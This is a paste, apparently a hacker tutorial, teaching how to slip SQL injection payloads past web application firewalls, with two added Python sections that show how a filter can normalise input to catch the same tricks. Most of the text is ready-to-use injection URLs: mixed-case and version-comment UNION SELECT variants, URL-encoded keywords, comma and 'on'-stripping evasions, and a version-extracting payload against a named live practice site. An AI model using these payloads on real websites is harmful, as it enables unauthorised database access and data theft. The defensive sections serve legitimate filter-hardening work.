mrfmr

Bypass WAF SQLi Manual

May 20th, 2018
Some injectors just use bypass queries without analysing which word (or which part of it) is being blocked by the WAF (Web Application Firewall).

First, some testing :D


If ORDER BY doesn't work, try group+by :D

http://www.webshit.com/vulnscript.php?id=1+order+by+1--+-

http://www.webshit.com/vulnscript.php?id=1+group+by+1--+-


----------------------------------------


http://www.webshit.com/vulnscript.php?id=1+union--+- [waf]

http://www.webshit.com/vulnscript.php?id=1+select--+- [No waf]

So the union keyword is blocked.
Let's try bypassing it with a mix of uppercase and lowercase.

http://www.webshit.com/vulnscript.php?id=1+uNiOn--+- [waf Bypassed]

Or if the WAF still catches it:

http://www.webshit.com/vulnscript.php?id=2 /*!uNiOn*/--+-

or

http://www.webshit.com/vulnscript.php?id=1+/*!50000uNiOn*/--+-


Okay, bypassed :D

-------------------------------------

Next step: union select

http://www.webshit.com/vulnscript.php?id=1+union--+- [no waf]

http://www.webshit.com/vulnscript.php?id=1+select--+- [no waf]

but when

http://www.webshit.com/vulnscript.php?id=1+union+select--+- [Waf]

So the WAF blocks the combination union select.

We can bypass that with

http://www.webshit.com/vulnscript.php?id=1+union+distinctROW+select--+-

or

http://www.webshit.com/vulnscript.php?id=1+union%23%0aselect--+-

Yuhuu, bypassed :D

---------------------------------------


Bypassing with URL encoding also works:

http://www.webshit.com/vulnscript.php?id=1+%75Nion+%73eLect--+-

%75 = u
%73 = s

----------------------------------------

http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1--+- [no waf]

http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,2--+- [waf]

Hmm, adding a comma (,) triggers the WAF, so the comma has to be bypassed :D

http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2--+- [bypassed]

http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2,~~3,~~4,~~5--+- [bypassed]

or

http://www.webshit.com/vulnscript.php?id=1+uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]

or with the JOIN method :v

----------------------------------------
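Every evasion in the sections above (mixed case, a `/*!50000 */` version comment, `%75` URL encoding, a `#` comment followed by a `%0a` newline, DISTINCTROW or `~~` placed between the tokens) targets a filter that pattern-matches the raw request string. A filter that decodes and normalises the value the way MySQL will parse it sees the same `union ... select` in every variant. The Python below is an added example written for this page, not code from the original paste; the function names `normalise`, `tokens`, `blocked_keywords` and `is_union_select` are my own, and the sample values are the parameter values from the URLs above.

```python
import re
from urllib.parse import unquote

# MySQL executes the body of a version comment /*!50000 ... */, so the body is kept.
_VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
# Ordinary block comments are whitespace to MySQL.
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Line comments: "-- " (dash dash whitespace) and "#" run to end of line.
_LINE_COMMENT = re.compile(r"--\s.*?$|#.*?$", re.M)


def normalise(value: str) -> str:
    """Reduce a query-string parameter to the token stream MySQL would parse."""
    # URL-decode to a fixed point so double encoding (%2575 -> %75 -> u) is undone.
    prev = None
    while value != prev:
        prev = value
        value = unquote(value)
    # In a query string '+' is a space.
    value = value.replace("+", " ")
    # Unwrap version comments first (their body is live SQL), then drop the rest.
    value = _VERSION_COMMENT.sub(r" \1 ", value)
    value = _BLOCK_COMMENT.sub(" ", value)
    value = _LINE_COMMENT.sub(" ", value)
    # Collapse whitespace (including the %0a newline trick) and case-fold.
    return " ".join(value.split()).lower()


def tokens(value: str) -> list:
    """Split the normalised value into words, numbers and single punctuation marks."""
    return re.findall(r"[a-z_]+|\d+|[^\sa-z_\d]", normalise(value))


def blocked_keywords(value: str) -> set:
    """Which of the filtered keywords are present once the value is normalised."""
    return {"union", "select"} & set(tokens(value))


def is_union_select(value: str) -> bool:
    """True when UNION is followed, at any distance, by SELECT."""
    toks = tokens(value)
    if "union" not in toks:
        return False
    return "select" in toks[toks.index("union") + 1:]


if __name__ == "__main__":
    # Constructed sample: the parameter values from the paste above.
    samples = [
        "1+uNiOn--+-",
        "2 /*!uNiOn*/--+-",
        "1+/*!50000uNiOn*/--+-",
        "1+union+distinctROW+select--+-",
        "1+union%23%0aselect--+-",
        "1+%75Nion+%73eLect--+-",
        "1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2,~~3,~~4,~~5--+-",
        "1+uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- -",
    ]
    for s in samples:
        print(f"{s!r:75} -> {normalise(s)!r} keywords={sorted(blocked_keywords(s))}")
```

Matching on tokens of the normalised value, rather than on the raw string, is what closes the whole class of keyword-splitting tricks on this page; the version-comment body is kept because MySQL runs it, while ordinary comments become whitespace. The fixed-point decode also covers double encoding, which the paste does not show.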

Some injectors use UnionOnOn / informationmation_schema_schema without knowing what that query is for :p

Okay, now let's find out :v

live target:

http://zixem.altervista.org/SQLi/level3.php?item=3'+union--+-

result:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'uni-- -'' at line 1

From that we can see the "on" in "union" has been removed :v

So how do we bypass it??

Just add another on to the union so it becomes unionon :v

http://zixem.altervista.org/SQLi/level3.php?item=3'+unionon--+-

Okay, bypassed :D

Next, the usual:

http://zixem.altervista.org/SQLi/level3.php?item=3%27+and+0+unionon+select+concat(%27versailles%20::%20%27,version()),2,4,5--+-

###############################
Alternative union select bypasses if the steps above still don't get through:

uni<>on sel<>ect

uni*on sel*ect

(uni)(on) (sel)(ect)

uni[]on sel[]ect

uni\on sel\ect
###############################
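The error message in the zixem section shows a filter that deletes the substring `on` and forwards the rest of the value, which is why doubling it survives one pass, and the `uni<>on` list relies on the same strip-and-forward habit applied to separator characters. As an added illustration, not code from the paste or from the target site, the Python below reconstructs that filter as `strip_once`, then shows two safer designs: `strip_to_fixpoint`, which repeats deletion until nothing changes, and `decide`, which judges a normalised copy and rejects instead of forwarding a mutated value. The blocklist `("on",)`, the `NOISE_CHARS` set and the function names are assumptions chosen to match the payloads listed above; a WAF is a backstop in any case and the query itself should use bound parameters.

```python
# Hypothetical reconstruction of the filter observed in the paste: deleting the
# substring "on" once turns "union" into "uni" and "unionon" into "union".
BLOCKED_WORDS = ("on",)
# Separator characters that the alternative payloads (uni<>on, uni*on, uni[]on,
# uni\on, (uni)(on)) count on a filter deleting before the keyword is reassembled.
NOISE_CHARS = "<>*[]\\()"
# Keywords a union-based injection needs; the hardened filter rejects on these.
KEYWORDS = ("union", "select")


def strip_once(value: str) -> str:
    """Flawed design: delete each blocked word once and forward what is left."""
    for word in BLOCKED_WORDS:
        value = value.replace(word, "", 1)
    return value


def _strip_noise(value: str) -> str:
    return value.translate(str.maketrans("", "", NOISE_CHARS))


def strip_to_fixpoint(value: str) -> str:
    """If deletion is used at all, repeat it until nothing changes, so that a
    keyword re-assembled by an earlier deletion is deleted as well."""
    prev = None
    while value != prev:
        prev = value
        value = _strip_noise(value)
        for word in BLOCKED_WORDS:
            value = value.replace(word, "")
    return value


def decide(value: str) -> str:
    """Hardened design: make the decision on a normalised copy and either reject
    or pass the original through untouched; never forward a mutated value."""
    norm = _strip_noise(value).lower()
    return "reject" if any(k in norm for k in KEYWORDS) else "allow"


if __name__ == "__main__":
    for probe in ("union", "unionon", "uni<>on sel<>ect", "(uni)(on) (sel)(ect)", "3"):
        print(f"{probe!r:24} strip_once={strip_once(probe)!r:10} "
              f"fixpoint={strip_to_fixpoint(probe)!r:10} decide={decide(probe)}")
```

`strip_once` is the behaviour the paste's error message reveals: one deletion, then the remainder reaches MySQL. `strip_to_fixpoint` closes the doubling trick but still mangles legitimate input that happens to contain a blocked substring, which is why `decide` is the better shape for a filter: it never hands the database something the client did not send.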